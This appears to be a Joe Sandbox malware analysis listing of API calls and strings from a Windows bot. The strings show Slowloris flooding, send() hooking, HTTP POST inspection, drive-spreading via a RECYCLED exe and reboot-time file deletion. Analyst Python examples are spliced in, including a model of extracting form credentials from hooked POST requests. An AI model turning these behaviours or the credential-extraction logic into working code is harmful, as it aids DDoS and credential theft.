• Opcode Fuzzy Hash: 2edbaf7844ecdb1393fe1ea98fe36e80b8307205f877c132f39058dd0b12e1e6
• Instruction Fuzzy Hash: 3791C5B6A04219EFD715CF68E8C4FAA77A8FB49304F004269E505DB381D771EE51CBA2
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003D90A0
                                                                    • Part of subcall function 003DA0F0: wcsrchr.MSVCRT(?,0000005C,?,?,003DA1D9,?,003D13BF,?,?,?,?,?,00000000,?,?,?), ref: 003DA0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 003D9101
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  • Opcode ID: 2de8c3ede32502611203e857e64b1075490a1944d8842823a8f92be982084143
                                                                  • Instruction ID: 4ca16dc86c2892b484f9c7a72177be3e86febc7d1933405d8fdc49914063ff7f
                                                                  • Instruction Fuzzy Hash: 0131F4B6E403556BDF22DA51BC0AFEB376C9B10350F054657FC149A382EA71ED60C7A2
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(003D6E9C,00000000,00000000,00000000,?,?,003D6E9C), ref: 003DB178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,003D6E9C), ref: 003DB186
                                                                  • lstrlenA.KERNEL32(003D6E9C,?,?,003D6E9C), ref: 003DB18F
                                                                  • strstr.MSVCRT(00000000,,00000000,003D6E9C,00000000,?,?,003D6E9C), ref: 003DB19F
                                                                  • strstr.MSVCRT(-00000004,003E19DC,?,?,?,003D6E9C), ref: 003DB1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,003D6E9C), ref: 003DB1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,003D6E9C), ref: 003DB1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,003D6E9C), ref: 003DB1F8
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  • Opcode ID: 5aa0ff57d6fe46b096632792f5a0ed9b5515c6a37e2db427a6458201d3eb1f67
                                                                  • Instruction ID: fbeb5a47e911f541656ddf0a57f798140b687dd9417f9ff34d287545a7c58110
                                                                  • Instruction Fuzzy Hash: 81117373A01354BBD721ABA69C85FEB77ACEF45711F014115FA04E7391DAB4EE0087A0
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 003DAC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 003DAC3E
                                                                  • GetLastError.KERNEL32 ref: 003DAC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 003DAC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 003DAC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 003DAC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DACB2
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  • Opcode ID: 9f32966a84bc3067a9cee64dbdb1bd6b12d7d86d74a2374e3787de0cacefdc9c
                                                                  • Instruction ID: a268d30b40438a05b09b9f0d5229074b0a280b4f4c47bd6ddb00dedfcf023351
                                                                  • Instruction Fuzzy Hash: D2219376611614BBD7329BA5AD88EFF7B7CEB85761F104259FA04D7280D6309D00C7A1
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003DA6AF
                                                                  • memset.MSVCRT(?,00000000,00000616,?,00000000,00000206), ref: 003DA6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 003DA6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 003DA6F9
                                                                  • _snwprintf.MSVCRT(?,00000617,"%s" %S,?,?), ref: 003DA71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 003DA77F
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  • Opcode ID: 77819245ca30d7a5291dc6bd017cb7e55881aadd794e0b612f742fd5ecffdcb8
                                                                  • Instruction ID: 0e1beb13de400c3eb8a6067eadd20a839d72454f3c45ae41791e02d85d31753d
                                                                  • Instruction Fuzzy Hash: 8821BB71940308BAEB21DBE0DC46FEE7378AF44B00F144685F6096E1C0EBF19E448B99
                                                                  APIs
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • GetTickCount.KERNEL32 ref: 003D9467
                                                                  • htons.WS2_32(?), ref: 003D9490
                                                                  • GetTickCount.KERNEL32(?), ref: 003D94BD
                                                                  • GetTickCount.KERNEL32 ref: 003D94C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 003D94F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D9511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 003D953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 003D9549
                                                                  • closesocket.WS2_32(?), ref: 003D9559
                                                                  • GetTickCount.KERNEL32(?), ref: 003D9564
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  • Opcode ID: 3d54589e553061f67ed33b157dc459d3801781e68a48489d56a9ebf71df76441
                                                                  • Instruction ID: 85e521eea913e2dae0f855e9555ea0f0194ed33284f2adc0836125a5d54e35c9
                                                                  • Instruction Fuzzy Hash: 52313A739001745BD722EBF9A846BAEB2A99F85304F020633F905EB3C1C5B08D0187A2
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,?), ref: 003DACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 003DAD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 003DAD2B
                                                                  • GetLastError.KERNEL32 ref: 003DAD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 003DAD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 003DAD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 003DAD80
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 003DAD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 003DADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DADE6
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: df8065c42b128f2fd9b96521b34f86d1f4ce45ae0236ff98a70b007096d37a7f
                                                                  • Instruction ID: 3dbc74ab238b4b08913de771d38ee90e81bdf1d9b93d66b54c7c1ad8f77c744b
                                                                  • Instruction Fuzzy Hash: 9731AF75500354BBD7229B95DC85FAA7BBCEB8A711F104245FA049B2C0D7B09E40CBA1
                                                                  APIs
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(?), ref: 003D935D
                                                                  • GetTickCount.KERNEL32(?), ref: 003D936F
                                                                  • GetTickCount.KERNEL32 ref: 003D9373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003D93A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D93C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 003D93DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003D93EB
                                                                  • closesocket.WS2_32(?), ref: 003D93F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 003D9405
                                                                  • GetTickCount.KERNEL32 ref: 003D9407
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: b2b0ca089be2a68618063d439e3dcc4854f75b49a776f0f8fec6807d43d2bf8a
                                                                  • Instruction ID: 0ad26b93ee245691003d0d805d80739b538ba71f3f4b9ef6a6d5f765b8096007
                                                                  • Instruction Fuzzy Hash: 8021C7739002256BD721FBB9AD85B9EB3699B84310F124727E918FB2C1D6B09D41CBD1
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DFCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DFCBD
                                                                  • _snprintf.MSVCRT(?,00000103,%0x.exe,00000000,30e44aa1,00000000), ref: 003DFCE0
                                                                  • lstrcpyW.KERNEL32(0041B9A0,0041ADA0), ref: 003DFCF2
                                                                  • lstrcpyA.KERNEL32(0041BDB0,RECYCLED), ref: 003DFD08
                                                                  • lstrcpyA.KERNEL32(0041BEB4,?), ref: 003DFD16
                                                                    • Part of subcall function 003DF9E0: memset.MSVCRT(?,00000000,000001FF), ref: 003DF9FF
                                                                    • Part of subcall function 003DF9E0: GetLogicalDriveStringsA.KERNEL32(000001FF,00000000), ref: 003DFA22
                                                                    • Part of subcall function 003DF9E0: lstrcatA.KERNEL32(00000000,003E3040), ref: 003DFA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DFD61
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 8473c6f7b583ab1595af5186c6203a0ea12624af75930793b82b7fbeddf7aa76
                                                                  • Instruction ID: 2f2fb493441fef0c949bbf23f97d5de1d68e114ccf96c13f022fe4325255511b
                                                                  • Instruction Fuzzy Hash: 3A11C4B2940368AFD312AB65ACC2FD5776CE708704F40817BF644962D2C7F419C18FA9
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000007FF,?,(m>), ref: 003D5844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D58B9
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 003D5970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5A05
                                                                    • Part of subcall function 003D49F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003D73CC,00407C98,00000000,00000000,00000010,00000000), ref: 003D4A10
                                                                    • Part of subcall function 003D49F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 003D4A77
                                                                  • Sleep.KERNEL32(00000001), ref: 003D59F9
                                                                  Similarity
                                                                  • API ID: CloseHandle$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (m>$.`=$STFU
                                                                  • API String ID: 1355865062-3008306076
                                                                  • Opcode ID: a1f39f6ac65c7e1a5b46391033606b31ec23884574eb49eadbf0e14a4f893803
                                                                  • Instruction ID: 312805df64010eafdb2e6a8308335d85996aed8fd038ceb2750016e659d1e37f
                                                                  • Instruction Fuzzy Hash: 22519371E00215ABDB25DFA8DC45BAE77B8EB84710F14816AF945EB381EB749E40CB90
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000034), ref: 003D89C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 003D8A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 003D8AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 003D8A79
                                                                    • Part of subcall function 003D8760: FreeContextBuffer.SECUR32(?), ref: 003D8774
                                                                    • Part of subcall function 003D8790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 003D88AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 003D8B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 003D8B1E
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: 00c07836cfea5094ea8f008ac63d367220df0194460e2728b98c946303383afa
                                                                  • Instruction ID: 8eefa13b26e6ae1f5f4339d88a06a9ac91e84c930739e8ad9e27283476182318
                                                                  • Instruction Fuzzy Hash: 67511BB2D00248AFDB21DF9ADC859AFFBFCFF94700F10451AE515EA251E774AA058B60
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FE), ref: 003D1D31
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,000003FE), ref: 003D1D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 003D1D9B
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003D1DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 003D1DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 003D1E0C
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 96b0f9833b23568945f283e8d0d7d761f3155d274345234c36a1fd79abd4dd50
                                                                  • Instruction ID: d0c21aba3603271d3a88b52f30a1cbb60828cccb2971150786c0e6f21532859d
                                                                  • Instruction Fuzzy Hash: DA31F6B66403547BD732DA55AC46FFB737DDF84711F00425AFE14AA2C1EBB09A10C6A1
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,0041AC50), ref: 003D100D
                                                                  • lstrcmpA.KERNEL32(?,0041AA28), ref: 003D1054
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 003D1062
                                                                  • lstrcpyA.KERNEL32(003E6D88,?), ref: 003D108B
                                                                  • lstrcpyA.KERNEL32(003E6E90,?), ref: 003D1093
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  • Opcode ID: 04ebf2ac60e6c9650553d5f981466777b780c5a7806725296773c8068a19d348
                                                                  • Instruction ID: 231f158da22b1fc199dac8292a2c198f3243c52055c55416a5196d3938902b51
                                                                  • Opcode Fuzzy Hash: 04ebf2ac60e6c9650553d5f981466777b780c5a7806725296773c8068a19d348
                                                                  • Instruction Fuzzy Hash: A201F537340290B7C33367AABC86EEBB79CDF687A0B040116F608D5281D670D890C2B5
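The MoveFileExA call in this entry passes a NULL new name together with MOVEFILE_DELAY_UNTIL_REBOOT, so the file is not touched now: Windows queues a delete for the next boot in the REG_MULTI_SZ value HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, stored as (source, destination) pairs in NT path form, where an empty destination means delete and a leading "!" on the destination means replace-existing. The check a responder wants is to read that value before the host reboots. The following is an added example, not code from the sample, the report or Joe Sandbox; it decodes the raw value bytes into pairs and lists the queued deletes. The sample value and its paths are constructed for the example.

```python
r"""Decode PendingFileRenameOperations to find files queued for deletion.

Added example, not from the report. Input is the raw REG_MULTI_SZ bytes of
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
(from a hive export or an offline hive parser): UTF-16LE strings, each
NUL-terminated, with a final extra NUL. Entries come in (source, destination)
pairs; an empty destination is a delete queued by MoveFileEx(...NULL,
MOVEFILE_DELAY_UNTIL_REBOOT), a "!" prefix on the destination means
MOVEFILE_REPLACE_EXISTING.
"""
from typing import Dict, List

NT_PREFIX = "\\??\\"


def encode_multi_sz(strings: List[str]) -> bytes:
    """Build REG_MULTI_SZ bytes: each string NUL-terminated, then a final NUL."""
    return ("".join(s + "\x00" for s in strings) + "\x00").encode("utf-16-le")


def decode_multi_sz(raw: bytes) -> List[str]:
    """Inverse of encode_multi_sz that keeps empty strings (the delete markers)."""
    text = raw.decode("utf-16-le")
    if text.endswith("\x00"):
        text = text[:-1]                      # drop the list terminator
    parts = text.split("\x00")
    if parts and parts[-1] == "":
        parts.pop()                           # drop the last string's own terminator
    return parts


def _strip_nt(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def pending_operations(raw: bytes) -> List[Dict]:
    """Return the queued operations as dicts with op/src/dst/replace_existing."""
    parts = decode_multi_sz(raw)
    if len(parts) % 2:
        raise ValueError("expected source/destination pairs")
    ops = []
    for src, dst in zip(parts[0::2], parts[1::2]):
        replace = dst.startswith("!")
        ops.append({
            "op": "delete" if dst == "" else "rename",
            "src": _strip_nt(src),
            "dst": _strip_nt(dst[1:] if replace else dst),
            "replace_existing": replace,
        })
    return ops


def pending_deletes(raw: bytes) -> List[str]:
    """Just the files that will disappear at next boot."""
    return [op["src"] for op in pending_operations(raw) if op["op"] == "delete"]


# Constructed sample value: a queued delete of the dropped sample plus one
# replace-existing rename. Paths are invented for the example.
SAMPLE_VALUE = encode_multi_sz([
    "\\??\\C:\\Users\\Public\\25F.tmp.exe", "",
    "\\??\\C:\\Windows\\Temp\\upd.tmp", "!\\??\\C:\\Program Files\\App\\app.exe",
])

if __name__ == "__main__":
    for op in pending_operations(SAMPLE_VALUE):
        print(op)
```

Work from the raw bytes rather than a convenience API that turns REG_MULTI_SZ into a list of strings: a delete entry is an empty string, which is indistinguishable from the double-NUL end marker to a naive splitter, so such APIs can stop right before the entries you are looking for.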
                                                                  APIs
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D9C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9C9A
                                                                  • lstrcpyA.KERNEL32(0041B648,003E1335), ref: 003D9CB3
                                                                  • lstrcpynA.KERNEL32(0041B648,00000000,00000200), ref: 003D9CC4
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D9CDB
                                                                  • atoi.MSVCRT(00000000), ref: 003D9CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9D73
                                                                  Strings
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 003D9CF9
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 003D9D45
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  • Opcode ID: 3f05cb43d14f2d3ebebb4978213ddc58f23265044b6fb651df73ae71fde8d0c0
                                                                  • Instruction ID: c265bde9434f26a13b1d3c8deae880ce6b0363c94b9df03b9186a70947223869
                                                                  • Opcode Fuzzy Hash: 3f05cb43d14f2d3ebebb4978213ddc58f23265044b6fb651df73ae71fde8d0c0
                                                                  • Instruction Fuzzy Hash: A02126732407946BD322ABE1FC86FEB379CE754705F10422AF6049A2D1C7B45850CBE5
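Entries like the two above repeat for every recovered function, which makes the listing long to read by hand. The following added example (not part of the report or of Joe Sandbox) parses the per-function "APIs", "Strings" and "Similarity" sections into records and tags the lines an analyst wants to see first, such as the MOVEFILE_DELAY_UNTIL_REBOOT argument and the flood log strings. The line shapes are taken from the entries on this page; the sample input is the Slowloris entry copied from above plus the preceding entry with its cut-off "APIs" header restored.

```python
"""Parse the per-function "APIs"/"Strings" entries of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox. Line shapes come from
the entries above: "APIs" opens an entry, "Instruction Fuzzy Hash" closes it,
API lines read "name.MODULE(args), ref: ADDR", strings 'text, xrefs: ADDR'.
"""
import re
from typing import Dict, List

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
ID_KEYS = ("API ID", "String ID", "API String ID", "Opcode ID",
           "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
# Substring -> tag: what an analyst wants surfaced first in a long listing.
FLAGS = {
    "MOVEFILE_DELAY_UNTIL_REBOOT": "file rename/delete queued for next boot",
    "flood": "DDoS command handler",
    "CreateRemoteThread": "remote thread creation",
}


def parse_listing(text: str) -> List[Dict]:
    records: List[Dict] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            line = line[1:].strip()
        if not line:
            continue
        if line == "APIs":                      # a new function entry begins
            rec = {"apis": [], "strings": [], "flags": []}
            records.append(rec)
            section = "apis"
            continue
        if rec is None:
            continue
        if line in ("Strings", "Memory Dump Source", "Similarity"):
            section = line.lower()
            continue
        for needle, tag in FLAGS.items():
            if needle in line and tag not in rec["flags"]:
                rec["flags"].append(tag)
        if section == "apis" and (m := API_RE.match(line)):
            rec["apis"].append({"name": m["name"], "module": m["module"],
                                "args": m["args"] or "", "ref": m["ref"],
                                "subcall": m["sub"]})
        elif section == "strings" and (m := STR_RE.match(line)):
            rec["strings"].append({"text": m["text"], "ref": m["ref"]})
        elif section == "similarity":
            key, _, val = line.partition(": ")
            if key in ID_KEYS:
                rec[key.lower().replace(" ", "_")] = val
            if key == "Instruction Fuzzy Hash":   # last line of the entry
                rec = None
    return records


# Sample input: the Slowloris entry copied from the report above, then the
# entry before it with the "APIs" header that is cut off there restored.
SAMPLE = """
APIs
• strtok.MSVCRT(?,003E29EC), ref: 003D9C7C
• HeapFree.KERNEL32(?,00000000,?), ref: 003D9C9A
• lstrcpyA.KERNEL32(0041B648,003E1335), ref: 003D9CB3
• lstrcpynA.KERNEL32(0041B648,00000000,00000200), ref: 003D9CC4
• strtok.MSVCRT(00000000,003E29EC), ref: 003D9CDB
• atoi.MSVCRT(00000000), ref: 003D9CE8
• HeapFree.KERNEL32(?,00000000,?), ref: 003D9D73
Strings
• [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 003D9CF9
• [Slowloris]: Finished flood on "%s", xrefs: 003D9D45
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Similarity
• API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
• String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
• API String ID: 1726920797-1250431664
• Instruction Fuzzy Hash: A02126732407946BD322ABE1FC86FEB379CE754705F10422AF6049A2D1C7B45850CBE5
APIs
• lstrcmpA.KERNEL32(?,0041AA28), ref: 003D1054
• MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 003D1062
  • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
Strings
Similarity
• String ID: %s.%s$pdef$ruskill
• Instruction Fuzzy Hash: A201F537340290B7C33367AABC86EEBB79CDF687A0B040116F608D5281D670D890C2B5
"""

if __name__ == "__main__":
    for i, r in enumerate(parse_listing(SAMPLE)):
        print(i, [a["name"] for a in r["apis"]], r["flags"])
```

The argument field is kept as the raw text between the outer parentheses because the report mixes literals, string constants and nested flag names (as in the MoveFileExA line) in one comma-separated list; split it further only once you know which call you are looking at.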
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 003E0C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 003E0C26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  • Opcode ID: 790f4b91fc9e9870806336c6398cf65237da3ccbdf481761b9d02a1dc27a5c9e
                                                                  • Instruction ID: 0f46f3d7070fe08e02f99f04fb2a3d4fdc4077aaa073616686eecfaefdf34ad0
                                                                  • Opcode Fuzzy Hash: 790f4b91fc9e9870806336c6398cf65237da3ccbdf481761b9d02a1dc27a5c9e
                                                                  • Instruction Fuzzy Hash: EF11C833F401B1519A2B52A77D02BEAA24C5B60762F060333FD0DDB3C1D5D1DAD081E2
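This entry resolves hook targets by name: send and GetAddrInfoW, with dnsapi.dll, nspr4.dll and wininet.dll among the module strings. Once send is hooked, every outgoing buffer passes through the bot, and the subcall at 003DAFA0 listed further down in this report parses it with sscanf("POST /%1023s") for the path and a 6-byte case-insensitive compare (_memicmp) against "Host: " for the host header. The following is an added example, an analyst's model rather than the sample's code, that applies those same two checks to a constructed request so it is clear what such a hook recovers: the full URL and the form body. Assumptions: CRLF as the line delimiter (the strtok delimiter string at 003E2B84 is not shown in the report), and that the %1023s width is the only bound on the path; the later 4-byte "HTTP" compare in that subcall is not modelled.

```python
"""Model of what a send() hook recovers from an outgoing HTTP POST.

Added example, not code from the sample or the report. It mirrors the two
parsing constants listed for subcall 003DAFA0: sscanf("POST /%1023s") for the
path and _memicmp(line, "Host: ", 6) for the host header. Assumed: the line
delimiter is CRLF, and the body is whatever follows the blank line in the same
send() buffer.
"""
import re
from typing import Dict, Optional

MAX_PATH = 1023  # the %1023s width: longer paths are silently truncated


def extract_post_target(request: bytes) -> Optional[Dict]:
    """Return host, path, url and body for a POST, or None for anything else."""
    head, _, body = request.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")        # strtok on CRLF (assumed)
    m = re.match(r"POST /(\S{1,%d})" % MAX_PATH, lines[0])  # sscanf("POST /%1023s")
    if not m:
        return None                                      # only POSTs carry form data
    host = None
    for line in lines[1:]:
        if line[:6].lower() == "host: ":                 # _memicmp(line, "Host: ", 6)
            host = line[6:].strip()
            break
    if not host:
        return None
    path = "/" + m.group(1)
    return {"host": host, "path": path, "url": f"http://{host}{path}", "body": body}


# Constructed request: lower-case "host:" shows the case-insensitive match,
# the credentials are invented for the example.
SAMPLE_REQUEST = (
    b"POST /login.php?next=/inbox HTTP/1.1\r\n"
    b"host: mail.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"user=alice&pass=s3cret&go=1"
)

if __name__ == "__main__":
    print(extract_post_target(SAMPLE_REQUEST))
```

Two details of the model matter in practice: a request line that does not begin with "POST /" is ignored entirely, so GETs carrying credentials in the query string are not captured by this path, and the 1023-byte width truncates long paths rather than rejecting them, so a very long query string is logged cut off.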
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC8E5
                                                                  • lstrcatA.KERNEL32(00000000,003E2C78,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0), ref: 003DC907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0), ref: 003DC913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC99C
